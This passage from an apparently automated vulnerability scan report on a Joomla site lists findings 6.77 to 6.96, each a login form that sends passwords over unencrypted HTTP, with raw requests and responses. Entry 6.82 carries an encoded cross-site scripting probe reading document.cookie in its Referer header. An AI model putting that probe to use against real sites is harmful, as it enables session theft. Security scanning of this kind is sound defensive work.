<input type="password" name="password" value="" size="8">
</td>
...[SNIP]...

6.77. http://www.lithuanianjoomla.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/index.php

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.78. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/

The form contains the following password field:

password

Request

GET /7-joomla-naujienos/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.79. http://www.lithuanianjoomla.com/apie-joomla.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/apie-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/apie-joomla.html

The form contains the following password field:

password

Request

GET /apie-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/apie-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.80. http://www.lithuanianjoomla.com/component/users/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/component/users/?task=user.login

The form contains the following password field:

password

Request

GET /component/users/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<div class="login">


                       <form action="/component/users/?task=user.login" method="post">

       <fieldset>
...[SNIP]...
</label>                    <input type="password" name="password" id="password" value="" class="validate-password required" size="25"/></div>
...[SNIP]...

6.81. http://www.lithuanianjoomla.com/component/users/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/component/users/

The form contains the following password field:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/component/users/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.82. http://www.lithuanianjoomla.com/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/index.php

The form contains the following password field:

password

Request

GET /index.php HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:16:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 21848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.83. http://www.lithuanianjoomla.com/joomla-naujienos.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.84. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.85. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.86. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.87. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.88. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.89. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.90. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/67-joomla-16-rc1-versija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.91. http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.92. http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:34 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.93. http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/70-joomla-16-isleista.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/70-joomla-16-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.94. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field:

password

Request

GET /joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.95. http://www.lithuanianjoomla.com/joomla-sasajos.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-sasajos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-sasajos.html

The form contains the following password field:

password

Request

GET /joomla-sasajos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-sasajos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.96. http://www.lithuanianjoomla.com/joomla-saugumas.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-saugumas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lithuanianjoomla.com/joomla-saugumas.html

The form contains the following password field:

password

Request

GET /joomla-saugumas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
